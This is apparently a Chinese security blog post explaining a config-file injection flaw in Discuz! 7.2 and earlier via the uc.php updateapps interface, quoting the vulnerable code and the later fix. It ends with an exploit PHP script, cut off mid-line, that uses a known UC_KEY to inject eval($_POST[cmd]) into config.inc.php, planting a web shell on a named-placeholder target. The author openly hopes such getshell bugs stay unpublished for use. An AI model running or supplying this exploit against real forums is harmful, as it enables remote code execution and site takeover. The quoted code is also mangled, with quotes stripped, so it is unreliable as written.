对于dz,我们比较关心的是拿shell,但dz的东西想拿shell太难太难了,上一篇文章的末尾铺垫了下,所以这篇文章也算不上马后炮了…这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有补。
这个漏洞其实也是老漏洞,去年大家就已经知道了,是二次写配置文件的漏洞,就是年初创始人通过后台ucenter拿shell漏洞的另外的利用办法。 很多人知道了,uc.php里的代码跟那个setting.inc.php相仿,但是dz官方在修复后台的时候没有同时对此进行修复,于是使这个漏洞一直存在至今。
当然,漏洞是依旧是鸡肋的,想要利用这个漏洞,必须满足两点条件:
1.必须知道UC_KEY,通常在配置文件里,或者ucenter的原始(没有经过修改的)数据库(应用)中;
2.配置文件config.inc.php必须可写。
好了,看看代码吧:
…functionupdateapps($get,$post){global$_DCACHE;if(!API_UPDATEAPPS){returnAPI_RETURN_FORBIDDEN;}$UC_API=$post[UC_API];if(empty($post)||empty($UC_API)){returnAPI_RETURN_SUCCEED;}$cachefile=$this->appdir../uc_client/data/cache/apps.php;$fp=fopen($cachefile,w);$s=”<?phprn”;$s.=$_CACHE[apps]=.var_export($post,TRUE).”;rn”;fwrite($fp,$s);fclose($fp);if(is_writeable($this->appdir../config.inc.php)){$configfile=trim(file_get_contents($this->appdir../config.inc.php));$configfile=substr($configfile,-2)==?>?substr($configfile,0,-2):$configfile;$configfile=preg_replace(“/define(UC_API,s*.*?);/i”,”define(UC_API,$UC_API);”,$configfile);//这里的问题if($fp=@fopen($this->appdir../config.inc.php,w)){@fwrite($fp,trim($configfile));@fclose($fp);}}global$_DCACHE;require_once$this->appdir../forumdata/cache/cache_settings.php;require_once$this->appdir../include/cache.func.php;foreach($postas$appid=>$app){if(!empty($app[viewprourl])){$_DCACHE[settings][ucapp][$appid][viewprourl]=$app[url].$app[viewprourl];}}updatesettings();returnAPI_RETURN_SUCCEED;}… 怎么修复,discuz! x1里是这么修复的:
$configfile = preg_replace(“/define(UC_API,s*.*?);/i”, “define(UC_API, “.addslashes($UC_API).”);”, $configfile);
具体我就不详细分析了,以前就讲过,大家可以看我之前那篇博文:http://www.2cto.com/Article/201001/44300.html
好久没看dz了,曾经的、保留很久的get webshell的漏洞基本都一个个被公布,然后被补上了…希望大家还是留点有用的漏洞吧,不然真没的玩啦(如果在后台还有的话)…
给出一个Exp:
<?php$timestamp=time()+10*3600;$host=”bbs.xxxxxx.com”;$uc_key=”A1v8Z5Z7feZdmfcd72J5C5V8hc8dM4F6V2g0h5ofXdS6jcm1C78bZede39z51610″;$code=urlencode(_authcode(“time=$timestamp&action=updateapps”,ENCODE,$uc_key));$cmd1=<?xmlversion=”1.0″encoding=”ISO-8859-1″?><root><itemid=”UC_API”>xxx);eval($_POST[cmd]);//</item></root>;$cmd2
